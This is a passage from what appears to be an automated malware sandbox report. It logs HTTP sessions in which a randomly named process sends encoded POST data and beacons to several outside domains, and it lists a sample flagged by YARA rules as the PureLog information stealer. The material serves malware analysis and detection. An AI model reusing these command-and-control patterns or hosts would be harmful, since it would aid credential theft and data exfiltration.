                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:18:15.858202934 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:15 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50022 | 208.91.197.27 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:21.652508020 CET | 799 | OUT | POST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=9mZWOizSlj6vlwlyhf0S018Il5wdOokwHWdZ9F/IwNn2jQoDqA4eFU66kq3op9nyNyr5z83c9OIEcRif3CE7fHPfTdvCn+lbQYtHujrHf3JT1UVQsf9VWkBtj0w39KkWQ07VZE32nI7bjZsApE0VfwyuBSxtlFb7dZV9qBNWORduzw6xB/vvUkh9cevTB9NQAA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50023 | 208.91.197.27 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:24.310187101 CET | 819 | OUT | POST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=9mZWOizSlj6v0gVyn8cS818PpZwdAIk8HWRZ9BHhx7/2j1UDpB4eAU663q2ikdn5NyWGz5Xc9OcEcTKfrjE0dXPdN9vApelbQYtHujWQfxhT0n9Qv6JSQUBuy0w3s6kSQ06GZFatnKzbjcAAqV0UGAyoFSx81HaibpMF0Hd4TQFM7W3rQOO4GkFOBZmnM+wZbOdoDrniZ6a1xP/1JcabGb8=


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 35 | 192.168.2.4 | 50024 | 208.91.197.27 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:18:26.970633030 CET | 10901 | OUT | POST /cbfz/ HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.cortisalincontrol.net
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 36 | 192.168.2.4 | 50025 | 208.91.197.27 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:18:29.630059004 CET | 515 | OUT | GET /cbfz/?JZOtU=wkx2NXiTkimKkWVHj8I851tghrwYfKl5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXS0bDb8L6xc5FYKVawF3pRnx98U9Wx8trKU0=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.cortisalincontrol.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                 Nov 29, 2024 09:18:31.437751055 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:30 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                Set-Cookie: vsid=907vr4804139107723603; expires=Wed, 28-Nov-2029 08:18:30 GMT; Max-Age=157680000; path=/; domain=www.cortisalincontrol.net; HttpOnly
                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mp4/YdyiFApSYOesm81kvj2Khq1KgzDsoapo3dqfmpulzgI+V5WC5yr72JYSrepB2ogA4w1EosUWmA1mLdt9Yg==
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 37 | 192.168.2.4 | 50026 | 217.160.0.200 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:18:37.625813007 CET | 778 | OUT | POST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI4PjImV4uvd0Jv2oGbt3cvgYOqQc1It/k2BTgFezXS29sMoEslWpMlojYrfY6JzgMc7RQghDv4t+9zuBw3RkAW9naijJOtuLaOYpAqE3rqt4UTtKbdcTUXz09Tz7o5mgq/rt241rrpQDX/tCWmzmusFyaCfV0Wy/S2ke3938NRJJ9eog1lU13Hw==
                                                                                                                                                                                 Nov 29, 2024 09:18:38.930466890 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:38 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 38 | 192.168.2.4 | 50027 | 217.160.0.200 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:18:40.302102089 CET | 798 | OUT | POST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIebkzRjgEfzXR29sUYElv2pHlouyrdc6Jz0Mc6hQhQDo59+/o+ByqhkAW9naijcrtujaOp5AqhLopt4Ve9KbMsTQXz1oTxfS5lIq/vp24kqZngDR7tDDpgj+lHmXLOxDRhTF3iTtsGdaDJtODvpBoXI+cx6d5ANK0gt91j3vSA9U2yw=
Nov 29, 2024 09:18:41.675199986 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:41 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip
Nov 29, 2024 09:18:41.675252914 CET | 899 | IN |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50028 | 217.160.0.200 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:42.969819069 CET | 10880 | OUT | POST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIeTkzCrgF8LXQ29sd4Egv2palo22rdBHJwMMccVQpDbo29+/3uB/3RkZW9XeijMrtujaOqxAo03omN4UTtK+dcToXzsfTxaw4Uoq8LN2/SeZhwDT+tCApnqklH7mLOEURiPF0m+uzlpMXopIYNF/tG4jSz248g1lu1NQ2V2LHCELrCK6aldHQGx4U/d67kV65Z9srlUVpqY9u/CADuT6mpIU/Uk7buCcafXpCi5glU4IAKXnjoptrXYCjTbJcvugLVC44LnnD9JmAr3iFE+GcN8aHBLEulaUaFFePh0Fs6KPvgnYI154/3eTYTtfyWnsdm96oyOIsIdbqrzoesDD57N+jpB9NqT9ZHVjlLyDskQgP3Kd4uMfaCXhyyNrp3N3AdFRkMU5dskcKBiQFpSPJDy8ZwWeg8wuzDepSss5PUKEQGzXSGi2qYGpywHg5KZumIhuI4+lLZF20BpCxQ1NStnBJLTo8Nwj4EARk1xgV/pnQrNul/6BXTRnVGDFC0Codj15z4K9bs3svRb7BSFE0fU+tGr702z71B1kANySxgwia9P+QqsXhqZ45tpP5lwbAHXdRNxb1l436BnHeKY0MSWdPG6qlVuj0sXqxc2iDDTSC97EhwiYATWljRSUV1Whks8RxSWPvU62HFrNppMRLvTym5mjC49ef4v4EmfTuSecqvu5bppjiR163i0EZyRR0P/Wiey0Sp+5yvsnxuDtnu9CcZ8YCtx5tdZ0BbiWh91vSbgNsgmtaDbUrfhrZcbQp/BLy9TY8IFx9Id2V+DkoGxwZt5V3193/LUpdqgSOTLCAR2zUuo66LZIjT4upjdz/2rJ80mRyYdkN7i+HVxgRdvKOy0FQO35QuXCBlRuIoCCpzO2wV21clJk9MgtSiHduIaiPbJfess6UiIskoAHAgf1AuvamNw6lcu59CcTZK0d9x1BdmBVX/jaKjNn1FJRY6fQYx [TRUNCATED]
Nov 29, 2024 09:18:44.332782030 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:44 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip
Nov 29, 2024 09:18:44.332804918 CET | 899 | IN |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50029 | 217.160.0.200 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:45.630177975 CET | 508 | OUT | GET /fqxx/?JZOtU=EQE6/f8JwKBVpYrOhw4vrtxv3XcBNO3b0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK38aa77s170gQvTYOFwikxrd70F79vmCfQ9/M=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:18:47.005672932 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 4545
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:46 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Nov 29, 2024 09:18:47.005693913 CET | 1236 | IN |
                                                                                                                                                                                Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
Nov 29, 2024 09:18:47.005702972 CET | 1236 | IN |
                                                                                                                                                                                Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
Nov 29, 2024 09:18:47.005810022 CET | 975 | IN |
                                                                                                                                                                                Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50030 | 154.70.82.246 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:53.525882006 CET | 793 | OUT | POST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=9aYLiYfVgRV0GCe/NGBZz/L7Us2S/0jbb+1Bi4ya5ki4e2rL9j21r/o7gBXYovm37DIv+oo7qSlEDBplTR7+/kRYw/8mMcIwfxkg0JgEZI4fzmY9IIKWFAhHoDbelvPmiT/Zxl+tApbFeqPGgUyvgv4T476x6ZEtgsHVIlK2jXL3RYooyRCPBKEFfburp0Xnzg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50031 | 154.70.82.246 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:56.180109978 CET | 813 | OUT | POST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=9aYLiYfVgRV0Hju/LlpZ2fL4aM2S0Ujfb+pBi5Gw4XK4dXbL8ni1s/o7vRWQmPm+7DEN+tI7qShEDENlTCT5/0RGuf8oRMIwfxkg0JdvZLIfzWo9It2VMghAvDbe0/PqiT++xnKHAqzFer/GuhSouf5alL7Tq7x2g92LKDWnhz/NUelyjgjYTKg2Ccnfk3quoj/Fa3VsrQn+OxtlvUjNEqs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50032 | 154.70.82.246 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:58.840838909 CET | 10895 | OUT | POST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Data Ascii: JZOtU= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50033 | 154.70.82.246 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:19:01.511279106 CET | 513 | OUT | GET /lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU= HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:19:03.384107113 CET | 468 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:19:03 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                Location: http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU=


                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:03:15:02
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\specifications.exe"
                                                                                                                                                                                Imagebase:0xdb0000
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5 hash:8F233B98037A9F801C3977AFE32776A6
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:03:15:06
